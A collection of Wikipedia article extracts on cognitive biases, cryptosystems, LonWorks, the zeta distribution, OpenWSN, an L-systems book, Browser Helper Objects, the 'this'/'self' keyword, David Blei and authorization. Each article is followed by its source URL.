Critics of Kahneman and Tversky, such asGerd Gigerenzer, alternatively argued that heuristics should not lead us to conceive of human thinking as riddled with irrational cognitive biases. They should rather conceiverationalityas an adaptive tool, not identical to the rules offormal logicor theprobability calculus.[16]Nevertheless, experiments such as the "Linda problem" grew into heuristics and biases research programs, which spread beyond academic psychology into other disciplines including medicine andpolitical science.
Biases can be distinguished on a number of dimensions. Examples of cognitive biases include -
Other biases are due to the particular way the brain perceives, forms memories and makes judgments. This distinction is sometimes described as "hot cognition" versus "cold cognition", asmotivated reasoningcan involve a state ofarousal. Among the "cold" biases,
As some biases reflect motivation specifically the motivation to have positive attitudes to oneself.[21]It accounts for the fact that many biases are self-motivated or self-directed (e.g.,illusion of asymmetric insight,self-serving bias). There are also biases in how subjects evaluate in-groups or out-groups; evaluating in-groups as more diverse and "better" in many respects, even when those groups are arbitrarily defined (ingroup bias,outgroup homogeneity bias).
Some cognitive biases belong to the subgroup ofattentional biases, which refers to paying increased attention to certain stimuli. It has been shown, for example, that people addicted to alcohol and other drugs pay more attention to drug-related stimuli. Common psychological tests to measure those biases are theStroop task[22][23]and thedot probe task.
Individuals' susceptibility to some types of cognitive biases can be measured by theCognitive Reflection Test(CRT) developed by Shane Frederick (2005).[24][25]
The following is a list of the more commonly studied cognitive biases:
Many social institutions rely on individuals to make rational judgments.
The securities regulation regime largely assumes that all investors act as perfectly rational persons. In truth, actual investors face cognitive limitations from biases, heuristics, and framing effects.
A fairjury trial, for example, requires that the jury ignore irrelevant features of the case, weigh the relevant features appropriately, consider different possibilities open-mindedly and resistfallaciessuch asappeal to emotion. The various biases demonstrated in these psychological experiments suggest that people will frequently fail to do all these things.[37]However, they fail to do so in systematic, directional ways that are predictable.[5]
In some academic disciplines, the study of bias is very popular. For instance, bias is a wide spread and well studied phenomenon because most decisions that concern the minds and hearts of entrepreneurs are computationally intractable.[12]
Cognitive biases can create other issues that arise in everyday life. One study showed the connection between cognitive bias, specifically approach bias, and inhibitory control on how much unhealthy snack food a person would eat.[38]They found that the participants who ate more of the unhealthy snack food, tended to have less inhibitory control and more reliance on approach bias. Others have also hypothesized that cognitive biases could be linked to various eating disorders and how people view their bodies and their body image.[39][40]
It has also been argued that cognitive biases can be used in destructive ways.[41]Some believe that there are people in authority who use cognitive biases and heuristics in order to manipulate others so that they can reach their end goals. Some medications and other health care treatments rely on cognitive biases in order to persuade others who are susceptible to cognitive biases to use their products. Many see this as taking advantage of one's natural struggle of judgement and decision-making. They also believe that it is the government's responsibility to regulate these misleading ads.
Cognitive biases also seem to play a role in property sale price and value. Participants in the experiment were shown a residential property.[42]Afterwards, they were shown another property that was completely unrelated to the first property. They were asked to say what they believed the value and the sale price of the second property would be. They found that showing the participants an unrelated property did have an effect on how they valued the second property.
Cognitive biases can be used in non-destructive ways. In team science and collective problem-solving, thesuperiority biascan be beneficial. It leads to a diversity of solutions within a group, especially in complex problems, by preventing premature consensus on suboptimal solutions. This example demonstrates how a cognitive bias, typically seen as a hindrance, can enhance collective decision-making by encouraging a wider exploration of possibilities.[43]
Cognitive biases are interlinked with collective illusions, a phenomenon where a group of people mistakenly believe that their views and preferences are shared by the majority, when in reality, they are not. These illusions often arise from various cognitive biases that misrepresent our perception of social norms and influence how we assess the beliefs of others.[44]
Because they causesystematic errors, cognitive biases cannot be compensated for using awisdom of the crowdtechnique of averaging answers from several people.[45]Debiasingis the reduction of biases in judgment and decision-making through incentives, nudges, and training.Cognitive bias mitigationandcognitive bias modificationare forms of debiasing specifically applicable to cognitive biases and their effects.Reference class forecastingis a method for systematically debiasing estimates and decisions, based on whatDaniel Kahnemanhas dubbed theoutside view.
Similar to Gigerenzer (1996),[46]Haselton et al. (2005) state the content and direction of cognitive biases are not "arbitrary" (p. 730).[1]Moreover, cognitive biases can be controlled. One debiasing technique aims to decrease biases by encouraging individuals to use controlled processing compared to automatic processing.[26]In relation to reducing theFAE, monetary incentives[47]and informing participants they will be held accountable for their attributions[48]have been linked to the increase of accurate attributions. Training has also shown to reduce cognitive bias. Carey K. Morewedge and colleagues (2015) found that research participants exposed to one-shot training interventions, such as educational videos and debiasing games that taught mitigating strategies, exhibited significant reductions in their commission of six cognitive biases immediately and up to 3 months later.[49]
Cognitive bias modificationrefers to the process of modifying cognitive biases in healthy people and also refers to a growing area of psychological (non-pharmaceutical) therapies for anxiety, depression and addiction called cognitive bias modification therapy (CBMT). CBMT is sub-group of therapies within a growing area of psychological therapies based on modifying cognitive processes with or without accompanying medication and talk therapy, sometimes referred to as applied cognitive processing therapies (ACPT). Although cognitive bias modification can refer to modifying cognitive processes in healthy individuals, CBMT is a growing area of evidence-based psychological therapy, in which cognitive processes are modified to relieve suffering[50][51]from seriousdepression,[52]anxiety,[53]and addiction.[54]CBMT techniques are technology-assisted therapies that are delivered via a computer with or without clinician support. CBM combines evidence and theory from the cognitive model of anxiety,[55]cognitive neuroscience,[56]and attentional models.[57]
Cognitive bias modification has also been used to help those with obsessive-compulsive beliefs and obsessive-compulsive disorder.[58][59]This therapy has shown that it decreases the obsessive-compulsive beliefs and behaviors.
Bias arises from various processes that are sometimes difficult to distinguish. These include:
People do appear to have stable individual differences in their susceptibility to decision biases such asoverconfidence,temporal discounting, andbias blind spot.[68]That said, these stable levels of bias within individuals are possible to change. Participants in experiments who watched training videos and played debiasing games showed medium to large reductions both immediately and up to three months later in the extent to which they exhibited susceptibility to six cognitive biases:anchoring, bias blind spot,confirmation bias,fundamental attribution error,projection bias, andrepresentativeness.[69]
Individual differences in cognitive bias have also been linked to varying levels of cognitive abilities and functions.[70]The Cognitive Reflection Test (CRT) has been used to help understand the connection between cognitive biases and cognitive ability. There have been inconclusive results when using the Cognitive Reflection Test to understand ability. However, there does seem to be a correlation; those who gain a higher score on the Cognitive Reflection Test, have higher cognitive ability and rational-thinking skills. This in turn helps predict the performance on cognitive bias and heuristic tests. Those with higher CRT scores tend to be able to answer more correctly on different heuristic and cognitive bias tests and tasks.[71]
Age is another individual difference that has an effect on one's ability to be susceptible to cognitive bias. Older individuals tend to be more susceptible to cognitive biases and have lesscognitive flexibility. However, older individuals were able to decrease their susceptibility to cognitive biases throughout ongoing trials.[72]These experiments had both young and older adults complete a framing task. Younger adults had more cognitive flexibility than older adults. Cognitive flexibility is linked to helping overcome pre-existing biases.
The list of cognitive biases has long been a topic of critique. In psychology a "rationality war"[73]unfolded betweenGerd Gigerenzerand the Kahneman and Tversky school, which pivoted on whether biases are primarily defects of human cognition or the result of behavioural patterns that are actually adaptive or "ecologically rational"[74]. Gerd Gigerenzer has historically been one of the main opponents to cognitive biases and heuristics.[75][76][77]Gigerenzer believes that cognitive biases are not biases, butrules of thumb, or as he would put it "gut feelings" that can actually help us make accurate decisions in our lives.
This debate has recently reignited, with critiques arguing there has been an overemphasis on biases in human cognition.[78]A key criticism is the continuous expansion of the list of alleged biases without clear evidence that these behaviors are genuinely biased once the actual problems people face are understood. Advances in economics and cognitive neuroscience now suggest that many behaviors previously labeled as biases might instead represent optimal decision-making strategies.
|
https://en.wikipedia.org/wiki/Cognitive_bias
|
Acryptosystemis a set ofcryptographicalgorithmsthat mapciphertextsandplaintextsto each other.[1]
Private-key cryptosystemsuse the samekeyforencryptionanddecryption.
Public-key cryptosystemsuse a public key for encryption and a private key for decryption.
|
https://en.wikipedia.org/wiki/List_of_cryptosystems
|
LonWorksorLocal Operating Networkis an open standard (ISO/IEC 14908) for networking platforms specifically created to address the needs of control applications. The platform is built on a protocol created byEchelon Corporationfor networking devices over media such astwisted pair,power lines,fiber optics, andwireless. It is used for the automation of various functions within buildings such aslightingandHVAC; seebuilding automation.
The technology had its origins with chip designs, power lines,twisted pairs, signaling technology,routers, network management software, and other products fromEchelon Corporation. In 1999 the communications protocol (then known asLonTalk) was submitted toANSIand accepted as a standard for control networking (ANSI/CEA-709.1-B). Echelon's power line andtwisted pairsignaling technology were also submitted toANSIfor standardization and acceptance. Since then, ANSI/CEA-709.1 has been accepted as the basis for IEEE 1473-L (in-train controls),AARelectro-pneumatic braking systems for freight trains,IFSF(European petrol station control),SEMI(semiconductor equipment manufacturing), and in 2005 asEN 14908(European building automation standard). The protocol is also one of several data link/physical layers of theBACnetASHRAE/ANSIstandard forbuilding automation.
Chinaratified the technology as a national controls standard, GB/Z 20177.1-2006, and as a building and intelligent community standard, GB/T 20299.4-2006; and in 2007 CECED, the European Committee of Domestic Equipment Manufacturers, adopted the protocol as part of its Household Appliances Control and Monitoring – Application Interworking Specification (AIS) standards.
In 2008,ISOandIECgranted the communications protocol, twisted pair signaling technology, power line signaling technology, andInternet Protocol(IP) compatibility standard numbers ISO/IEC 14908-1, -2, -3, and -4.[1]
By 2010, approximately 90 million devices were installed with LonWorks technology. Manufacturers in a variety of industries including building, home, street lighting, transportation, utility, and industrial automation have adopted the platform as the basis for their product and service offerings. Statistics as to the number of locations using the LonWorks technology are scarce, but products and applications built on top of the platform include such diverse functions as embedded machine control, municipal and highway/tunnel/street lighting, heating and air conditioning systems, intelligent electricity metering, subway train control, building lighting, stadium lighting and speaker control, security systems, fire detection and suppression, and newborn location monitoring and alarming, as well as remote power generation load control.
Two physical-layer signaling technologies,twisted pairfree topologyand power-line carrier, are typically included in each of the standards created around the LonWorks technology. The two-wire layer operates at 78 kbit/s usingdifferential Manchester encoding, while the power line achieves either 5.4 or 3.6 kbit/s, depending on frequency.[2]
Additionally, the LonWorks platform uses an affiliated IP tunneling standard—ISO/IEC 14908-4[3](ANSI/CEA-852)[4]—in use by a number of manufacturers[5]to connect the devices on previously deployed and new LonWorks platform-based networks to IP-aware applications or remote network-management tools. Many LonWorks platform-based control applications are being implemented with some sort of IP integration, either at the UI/application level or in the controls infrastructure. This is accomplished with Web services or IP-routing products available in the market.
An Echelon Corporation-designedICconsisting of several 8-bit processors, theNeuron chipwas initially the only way to implement a LonTalk protocol node and is used in the large majority of LonWorks platform-based hardware. Since 1999, the protocol has been available for general-purpose processors: A port of the ANSI/CEA-709.1 standard to IP-based or 32-bit chips.[6]
As of 14 September, 2018, Echelon Corporation was acquired byAdesto TechnologiesCorporation.[7]Adesto was then acquired byDialog Semiconductor[8]who were then acquired byRenesas Electronics.[9]As of 2024, Renesas continues to offer LonWorks (and BACnet) products.[10]
One of the keys to the interoperability of the system is the standardisation of the variables used to describe physical things to LonWorks. This standards list is maintained by LonMark International, and each standard parameter is known as Standard Network Variable Type (SNVT, pronounced "sniv-it.") For example, a thermostat might report temperature using theSNVT_temp,defined as a 2-byte integer between zero and 65535, and representing a temperature between-274.0and 6279.5 degrees Celsius at a precision of 0.1 °C.[12]
|
https://en.wikipedia.org/wiki/LonWorks
|
Inprobability theoryandstatistics, thezeta distributionis a discreteprobability distribution. IfXis a zeta-distributedrandom variablewith parameters, then the probability thatXtakes the positive integer valuekis given by theprobability mass function
whereζ(s) is theRiemann zeta function(which is undefined fors= 1).
The multiplicities of distinctprime factorsofXareindependentrandom variables.
TheRiemann zeta functionbeing the sum of all termsk−s{\displaystyle k^{-s}}for positive integerk, it appears thus as the normalization of theZipf distribution. The terms "Zipf distribution" and "zeta distribution" are often used interchangeably. But while the Zeta distribution is aprobability distributionby itself, it is not associated withZipf's lawwith the same exponent.
The Zeta distribution is defined for positive integersk≥1{\displaystyle k\geq 1}, and its probability mass function is given by
wheres>1{\displaystyle s>1}is the parameter, andζ(s){\displaystyle \zeta (s)}is theRiemann zeta function.
The cumulative distribution function is given by
whereHk,s{\displaystyle H_{k,s}}is the generalizedharmonic number
Thenth rawmomentis defined as the expected value ofXn:
The series on the right is just a series representation of the Riemann zeta function, but it only converges for values ofs−n{\displaystyle s-n}that are greater than unity. Thus:
The ratio of the zeta functions is well-defined, even forn>s− 1 because the series representation of the zeta function can beanalytically continued. This does not change the fact that the moments are specified by the series itself, and are therefore undefined for largen.
Themoment generating functionis defined as
The series is just the definition of thepolylogarithm, valid foret<1{\displaystyle e^{t}<1}so that
Since this does not converge on an open interval containingt=0{\displaystyle t=0}, the moment generating function does not exist.
ζ(1) is infinite as theharmonic series, and so the case whens= 1 is not meaningful. However, ifAis any set of positive integers that has a density, i.e. if
exists whereN(A,n) is the number of members ofAless than or equal ton, then
is equal to that density.
The latter limit can also exist in some cases in whichAdoes not have a density. For example, ifAis the set of all positive integers whose first digit isd, thenAhas no density, but nonetheless, the second limit given above exists and is proportional to
which isBenford's law.
The Zeta distribution can be constructed with a sequence of independent random variables with ageometric distribution. Letp{\displaystyle p}be aprime numberandX(p−s){\displaystyle X(p^{-s})}be a random variable with a geometric distribution of parameterp−s{\displaystyle p^{-s}}, namely
P(X(p−s)=k)=p−ks(1−p−s){\displaystyle \quad \quad \quad \mathbb {P} \left(X(p^{-s})=k\right)=p^{-ks}(1-p^{-s})}
If the random variables(X(p−s))p∈P{\displaystyle (X(p^{-s}))_{p\in {\mathcal {P}}}}are independent, then, the random variableZs{\displaystyle Z_{s}}defined by
Zs=∏p∈PpX(p−s){\displaystyle \quad \quad \quad Z_{s}=\prod _{p\in {\mathcal {P}}}p^{X(p^{-s})}}
has the zeta distribution:P(Zs=n)=1nsζ(s){\displaystyle \mathbb {P} \left(Z_{s}=n\right)={\frac {1}{n^{s}\zeta (s)}}}.
Stated differently, the random variablelog(Zs)=∑p∈PX(p−s)log(p){\displaystyle \log(Z_{s})=\sum _{p\in {\mathcal {P}}}X(p^{-s})\,\log(p)}isinfinitely divisiblewithLévy measuregiven by the following sum ofDirac masses:
Πs(dx)=∑p∈P∑k⩾1p−kskδklog(p)(dx){\displaystyle \quad \quad \quad \Pi _{s}(dx)=\sum _{p\in {\mathcal {P}}}\sum _{k\geqslant 1}{\frac {p^{-ks}}{k}}\delta _{k\log(p)}(dx)}
Other "power-law" distributions
|
https://en.wikipedia.org/wiki/Zeta_distribution
|
OpenWSN[1][2]is a project created at theUniversity of California Berkeleyand extended at theINRIAand at theOpen University of Catalonia(UOC)[3]which aims to build an open standard-based andopen sourceimplementation of a complete constrained network protocol stack forwireless sensor networksandInternet of Things. The root of OpenWSN is a deterministicMAC layerimplementing the IEEE 802.15.4e TSCH based on the concept ofTime Slotted Channel Hopping(TSCH). Above the MAC layer, the Low Power Lossy Network stack is based on IETF standards including the IETF 6TiSCH management and adaptation layer (a minimal configuration profile, 6top protocol and different scheduling functions). The stack is complemented by an implementation of 6LoWPAN, RPL in non-storing mode, UDP and CoAP, enabling access to devices running the stack from the nativeIPv6through open standards.
OpenWSN is related to other projects including the following:
OpenWSN is available forLinux,WindowsandOS Xplatforms. Current release of OpenWSN is 1.14.0.
|
https://en.wikipedia.org/wiki/OpenWSN
|
The Algorithmic Beauty of Plantsis a book byPrzemyslaw PrusinkiewiczandAristid Lindenmayer. It is notable as it is the first comprehensive volume on the computer simulation of certainpatterns in naturefound in plant development (L-systems).
The book is no longer in print but is available free online.[1]
The book has eight chapters:
George Klir, reviewing the book in theInternational Journal of General Systems, writes that "This book, full of beautiful pictures ofplantsof great variety, is a testimony of the genius ofAristid Lindenmayer, who invented in 1968 systems that are now named by him --Lindenmayer systemsorL-systems. It is also a testimony of the power of current computer technology. The pictures in the book are not photographs of real plants. They are all generated on the computer by relatively simplealgorithmsbased upon the idea of L-systems."[2]Klir goes on to explain the mathematics of L-systems, involving replacement of strings of symbols with further strings according to production rules, adding that "high computer power is essential since the generation of realistic forms requires tremendous numbers of replacements and the geometric interpretation of the generated strings requires a highly sophisticated computer graphics".[2]
Adrian Bell, reviewing the book inNew Phytologist, writes that it demands respect for three reasons, namely that it is the first book to explain the algorithms behind virtual plants, it "unashamedly" connects art and science, and is unusual in being a real book on a computer-based subject. Each chapter, writes Bell, is an introductory manual to the simulation of an aspect of plant form, resulting "eventually" in a 3-D image of a plant architecture.[3]
Peter Antonelli, reviewing the book inSIAM Review, writes that it presents a "beautifully designed 'coffee-table-book'" summary of Lindenmayer's school of thought, explaining how Algorithmic Language Theory, likeNoam Chomsky's theory ofgrammar, can describe how repeated structural units can arrange themselves. Antonelli suggests thatGoethewould have disapproved of having the barrier of mathematics between the observer and the observed.[4]
Karl Niklas, reviewing the book inThe Quarterly Review of Biology, writes that the book, intended for many different audiences, is "unequally successful" in reaching them. Niklas suggests that those who wonder about howgraphic artistscreate "the magnificent cyber-floras that sway and grow so realistically in the movies", and those who admireplant symmetrywill enjoy the book. He is more skeptical about its claim to serious science as the book "fails to educate its readers" about the challenge of understanding plant form in terms ofdevelopmental biology. Therefore he believes the book falls short, the dazzling beauty offractalsnot proving their relevance to biology.[5]
|
https://en.wikipedia.org/wiki/The_Algorithmic_Beauty_of_Plants
|
ABrowser Helper Object(BHO) is aDLLmoduledesigned as apluginfor theMicrosoftInternet Explorerweb browserto provide added functionality. BHOs were introduced in October 1997 with the release ofversion 4of Internet Explorer. Most BHOs are loaded once by each new instance of Internet Explorer. However, in the case ofWindows Explorer, a new instance is launched for each window.
BHOs are still supported as of Windows 10, throughInternet Explorer 11, while BHOs are not supported inMicrosoft Edge.
Each time a new instance of Internet Explorer starts, it checks theWindows Registryfor the keyHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects. If Internet Explorer finds this key in the registry, it looks for aCLSIDkey listed below the key. The CLSID keys under Browser Helper Objects tell the browser which BHOs to load. Removing the registry key prevents the BHO from being loaded. For each CLSID that is listed below the BHO key, Internet Explorer calls CoCreateInstance to start the instance of the BHO in the same process space as the browser. If the BHO is started and implements the IObjectWithSite interface, it can control and receive events from Internet Explorer. BHOs can be created in any language that supportsCOM.[1]
Some modules enable the display of different file formats not ordinarily interpretable by the browser. TheAdobe Acrobatplug-in that allows Internet Explorer users to readPDFfiles within their browser is a BHO.
Other modules add toolbars to Internet Explorer, such as theAlexa Toolbarthat provides a list of web sites related to the one you are currently browsing, or theGoogle Toolbarthat adds a toolbar with a Google search box to the browseruser interface.
The Conduit toolbars are based on a BHO that can be used onInternet Explorer 7and up. This BHO provides a search facility that connects toMicrosoft'sBingsearch.
The BHOAPIexposeshooksthat allow the BHO to access theDocument Object Model(DOM) of the current page and to control navigation. Because BHOs have unrestricted access to the Internet Explorer event model, some forms ofmalware(such as adware and spyware) have also been created as BHOs.[2][3]
For example, theDownload.jectmalware is a BHO that is activated when a secureHTTPconnection is made to a financial institution, then begins torecord keystrokesfor the purpose of capturing user passwords. TheMyWay Searchbartracks users' browsing patterns and passes the information it records to third parties. TheC2.LOPmalware adds links and popups of its own to web pages in order to drive users topay-per-clickwebsites.[citation needed]
Many BHOs introduce visible changes to a browser's interface, such as installing toolbars inInternet Explorerand the like, but others run without any change to the interface. This renders it easy for malicious coders to conceal the actions of their browser add-on, especially since, after being installed, the BHO seldom requires permission before performing further actions. For instance, variants of the ClSpring trojan use BHOs to install scripts to provide a number of instructions to be performed such as adding and deleting registry values and downloading additional executable files, all completely transparently to the user.[4]
In response to the problems associated with BHOs and similar extensions to Internet Explorer, Microsoft debuted anAdd-on ManagerinInternet Explorer 6with the release ofService Pack 2forWindows XP(updating it to IE6 Security Version 1, a.k.a. SP2). This utility displays a list of all installed BHOs,browser extensionsandActiveX controls, and allows the user to enable or disable them at will. There are also free tools (such as BHODemon) that list installed BHOs and allow the user to disable malicious extensions.Spybot S&Dadvanced mode has a similar tool built in to allow the user to disable installed BHO.
|
https://en.wikipedia.org/wiki/Browser_Helper_Object
|
this,self, andMearekeywordsused in some computerprogramming languagesto refer to the object, class, or other entity which the currently running code is a part of. The entity referred to thus depends on theexecution context(such as which object has its method called). Different programming languages use these keywords in slightly different ways. In languages where a keyword like "this" is mandatory, the keyword is the only way to access data and methods stored in the current object. Where optional, these keywords can disambiguate variables and functions with the same name.
In manyobject-orientedprogramming languages,this(also calledselforMe) is a variable that is used ininstance methodsto refer to the object on which they are working. The first OO language,SIMULA 67, usedthisto explicitly reference the local object.[1]: 4.3.2.3C++and languages which derive in style from it (such asJava,C#,D, andPHP) also generally usethis.Smalltalkand others, such asObject Pascal,Perl,Python,Ruby,Rust,Objective-C,DataFlexandSwift, useself. Microsoft'sVisual BasicusesMe.
The concept is similar in all languages:thisis usually an immutablereferenceorpointerwhich refers to the current object; the current object often being the code that acts as 'parent' or 'invocant' to theproperty,method, sub-routine or function that contains thethiskeyword. After an object is properly constructed, or instantiated,thisis always a valid reference. Some languages require it explicitly; others uselexical scopingto use it implicitly to make symbols within their class visible. Or alternatively, the current object referred to bythismay be an independent code object that has called the function or method containing the keywordthis. Such a thing happens, for example, when aJavaScriptevent handler attached to an HTML tag in a web page calls a function containing the keywordthisstored in the global space outside the document object; in that context,thiswill refer to the page element within the document object, not the enclosing window object.[2]
In some languages, for example C++, Java, and Rakuthisorselfis akeyword, and the variable automatically exists in instance methods. In others, for example, Python, Rust, and Perl 5, the firstparameterof an instance method is such a reference. It needs to be specified explicitly. In Python and Perl, the parameter need not necessarily be namedthisorself; it can be named freely by the programmer like any other parameter. However, by informal convention, the first parameter of an instance method in Perl or Python is namedself. Rust requires the self object to be called&selforself, depending on whether the invoked function borrows the invocant, or moves it in, respectively.
Static methodsin C++ or Java are not associated with instances but classes, and so cannot usethis, because there is no object. In other languages, such as Ruby, Smalltalk, Objective-C, or Swift, the method is associated with aclass objectthat is passed asthis, and they are calledclass methods. For class methods, Python usesclsto access to theclass object.
When lexical scoping is used to inferthis, the use ofthisin code, while not illegal, may raise warning bells to a maintenance programmer, although there are still legitimate uses ofthisin this case, such as referring to instance variables hidden by local variables of the same name, or if the method wants to return a reference to the current object, i.e.this, itself.
In some compilers (for exampleGCC), pointers to C++ instance methods can be directly cast to a pointer of another type, with an explicitthispointer parameter.[3]
The dispatch semantics ofthis, namely that method calls onthisare dynamically dispatched, is known asopen recursion, and means that these methods can beoverriddenby derived classes or objects. By contrast, direct named recursion oranonymous recursionof a function usesclosed recursion, with static dispatch. For example, in the followingPerlcode for the factorial, the token__SUB__is a reference to the current function:
By contrast, in C++ (using an explicitthisfor clarity, though not necessary) thethisbinds to the object itself, but if the class method was declared "virtual" i.e. polymorphic in the base, it's resolved via dynamic dispatch so that derived classes can override it.
This example is artificial since this is direct recursion, so overriding thefactorialmethod would override this function; more natural examples are when a method in a derived class calls the same method in a base class, or in cases of mutual recursion.[4][5]
Thefragile base classproblem has been blamed on open recursion, with the suggestion that invoking methods onthisdefault to closed recursion (static dispatch) rather than open recursion (dynamic dispatch), only using open recursion when it is specifically requested; external calls (not usingthis) would be dynamically dispatched as usual.[6][7]The way this is solved in practice in the JDK is through a certain programmer discipline; this discipline has been formalized by C. Ruby and G. T. Leavens; it consists of the following rules:[8]
Early versions of C++ would let thethispointer be changed; by doing so a programmer could change which object a method was working on. This feature was eventually removed, and nowthisin C++ is anr-value.[9]
Early versions of C++ did not include references and it has been suggested that had they been so inC++from the beginning,thiswould have been a reference, not a pointer.[10]
C++ lets objects destroy themselves with the source code statement:delete this.
The keywordthisinC#works the same way as in Java, for reference types. However, within C#value types,thishas quite different semantics, being similar to an ordinary mutable variable reference, and can even occur on the left side of an assignment.
One use ofthisin C# is to allow reference to an outer field variable within a method that contains a local variable that has the same name. In such a situation, for example, the statementvar n = localAndFieldname;within the method will assign the type and value of the local variablelocalAndFieldnameton, whereas the statementvar n = this.localAndFieldname;will assign the type and value of the outer field variable ton.[11]
InDthisin a class, struct, or union method refers to an immutable reference of the instance of the enclosing aggregate. Classes arereferencetypes, and structs and unions are value types. In the first version of D, the keywordthisis used as a pointer to the instance of the object the method is bound to, while in D2 it has the character of an implicitreffunction argument.
In the programming languageDylan, which is an object-oriented language that supportsmultimethodsand doesn't have a concept ofthis, sending a message to an object is still kept in the syntax. The two forms below work in the same way; the differences are justsyntactic sugar.
and
Within a class text, thecurrent typeis the type obtained from thecurrent class. Within features (routines, commands and queries) of a class, one may use the keywordCurrentto reference the current class and its features. The use of the keywordCurrentis optional as the keywordCurrentis implied by simply referring to the name of the current class feature openly. For example: One might have a feature `foo' in a class MY_CLASS and refer to it by:
[12]
Line #10 (above) has the implied reference toCurrentby the call to simple `foo'.
Line #10 (below) has the explicit reference toCurrentby the call to `Current.foo'.
Either approach is acceptable to the compiler, but the implied version (e.g.x := foo) is preferred as it is less verbose.
As with other languages, there are times when the use of the keywordCurrentis mandated, such as:
In the case of the code above, the call on line #11 tomake_with_somethingis passing the current class by explicitly passing the keywordCurrent.
The keywordthisis aJavalanguage keyword that represents the current instance of the class in which it appears. It is used to access class variables and methods.
Since all instance methods are virtual in Java,thiscan never be null.[13]
In JavaScript, which is a programming orscripting languageused extensively in web browsers,thisis an important keyword, although what it evaluates to depends on where it is used.
To work around the different meaning ofthisin nested functions such as DOM event handlers, it is a common idiom in JavaScript to save thethisreference of the calling object in a variable (commonly calledthatorself), and then use the variable to refer to the calling object in nested functions.
For example:
Notably, JavaScript makes use of boththisand the related keywordself[17](in contrast to most other languages which tend to employ one or the other), withselfbeing restricted specifically to web workers.[18]
Finally, as a reliable way of specifically referencing the global (window or equivalent) object, JavaScript features theglobalThiskeyword.[19]
In Lua,selfis created assyntactic sugarwhen functions are defined using the:operator.[20]When invoking a method using:, the object being indexed will be implicitly given as the first argument to the function being invoked.
For example, the following two functions are equivalent:
Lua itself is not object-oriented, but when combined with another feature called metatables, the use ofselflets programmers define functions in a manner resembling object-oriented programming.
In PowerShell, the specialautomatic variable$_contains the current object in the pipeline object. You can use this variable in commands that perform an action on every object or on selected objects in a pipeline.[21]
Also starting with PowerShell 5.0, which adds a formal syntax to define classes and other user-defined types,[22]$thisvariable describes the current instance of the object.
In Python, there is no keyword forthis. When a member function is called on an object, it invokes the member function with the same name on the object's class object, with the object automatically bound to the first argument of the function. Thus, the obligatory first parameter ofinstance methodsserves asthis; this parameter is conventionally namedself, but can be named anything.
In class methods (created with theclassmethoddecorator), the first argument refers to the class object itself, and is conventionally calledcls; these are primarily used for inheritable constructors,[23]where the use of the class as a parameter allows subclassing the constructor. In static methods (created with thestaticmethoddecorator), no special first argument exists.
In Rust, types are declared separately from the functions associated with them. Functions designed to be analogous to instance methods in more traditionally object-oriented languages must explicitly takeselfas their first parameter. These functions can then be called usinginstance.method()syntax sugar. For example:
This defines a type,Foo, which has four associated functions. The first,Foo::new(), is not an instance function and must be specified with the type prefix. The remaining three all take aselfparameter in a variety of ways and can be called on aFooinstance using the dot-notation syntax sugar, which is equivalent to calling the type-qualified function name with an explicitselffirst parameter.
TheSelflanguage is named after this use of "self".
Selfis strictly used within methods of a class.
Another way to refer toSelfis to use::.
|
https://en.wikipedia.org/wiki/Open_recursion
|
David Meir Bleiis a professor in the Statistics and Computer Science departments atColumbia University. Prior to fall 2014 he was an associate professor in the Department ofComputer ScienceatPrinceton University. His work is primarily inmachine learning.
His research interests includetopic modelsand he was one of the original developers oflatent Dirichlet allocation, along withAndrew NgandMichael I. Jordan. As of June 18, 2020, his publications have been cited 109,821 times, giving him anh-indexof 97.[1]
Blei received the ACM Infosys Foundation Award in 2013. (This award is given to a computer scientist under the age of 45. It has since been renamed the ACM Prize in Computing.) He was named Fellow ofACM"For contributions to the theory and practice of probabilistic topic modeling and Bayesian machine learning" in 2015.[2]
This biographical article relating to acomputer scientistis astub. You can help Wikipedia byexpanding it.
|
https://en.wikipedia.org/wiki/David_Blei
|
Authorizationorauthorisation(seespelling differences), ininformation security,computer securityandIAM(Identity and Access Management),[1]is the function of specifying rights/privileges for accessing resources, in most cases through an access policy, and then deciding whether a particularsubjecthas privilege to access a particularresource. Examples ofsubjectsinclude human users, computersoftwareand otherhardwareon the computer. Examples ofresourcesinclude individual files or an item'sdata,computer programs, computerdevicesand functionality provided bycomputer applications. For example, user accounts forhuman resourcesstaff are typically configured with authorization for accessing employee records.
Authorization is closely related toaccess control, which is what enforces the authorization policy by deciding whether access requests to resources from (authenticated) consumers shall be approved (granted) or disapproved (rejected).[2]
Authorization should not be confused withauthentication, which is the process of verifying someone's identity.
IAMconsists the following two phases: the configuration phase where a user account is created and its corresponding access authorization policy is defined, and the usage phase where user authentication takes place followed by access control to ensure that the user/consumer only gets access to resources for which they are authorized. Hence, access control incomputersystems andnetworksrelies on access authorization specified during configuration.
Authorization is the responsibility of anauthority, such as a department manager, within the application domain, but is often delegated to a custodian such as a system administrator. Authorizations are expressed as access policies in some types of "policy definition application", e.g. in the form of anaccess control listor acapability, or a policy administration point e.g.XACML.
Broken authorization is often listed as the number one risk in web applications.[3]On the basis of the "principle of least privilege", consumers should only be authorized to access whatever they need to do their jobs, and nothing more.[4]
"Anonymous consumers" or "guests", are consumers that have not been required to authenticate. They often have limited authorization. On a distributed system, it is often desirable to grant access without requiring a unique identity. Familiar examples ofaccess tokensinclude keys, certificates and tickets: they grant access without proving identity.
A widely used framework for authorizing applications isOAuth 2. It provides a standardized way for third-party applications to obtain limited access to a user's resources without exposing their credentials.[5]
In modern systems, a widely used model for authorization isrole-based access control(RBAC) where authorization is defined by granting subjects one or more roles, and then checking that the resource being accessed has been assigned at least one of those roles.[5]However, with the rise of social media,Relationship-based access controlis gaining more prominence.[6]
Even when access is controlled through a combination of authentication andaccess control lists, the problems of maintaining the authorization data is not trivial, and often represents as much administrative burden as managing authentication credentials. It is often necessary to change or remove a user's authorization: this is done by changing or deleting the corresponding access rules on the system. Usingatomic authorizationis an alternative to per-system authorization management, where atrusted third partysecurely distributes authorization information.
Inpublic policy, authorization is a feature of trusted systems used forsecurityorsocial control.
Inbanking, anauthorizationis a hold placed on a customer's account when a purchase is made using adebit cardorcredit card.
Inpublishing, sometimes public lectures and other freely available texts are published without the approval of theauthor. These are called unauthorized texts. An example is the 2002'The Theory of Everything: The Origin and Fate of the Universe', which was collected fromStephen Hawking's lectures and published without his permission as per copyright law.[citation needed]
|
https://en.wikipedia.org/wiki/Authorization
|
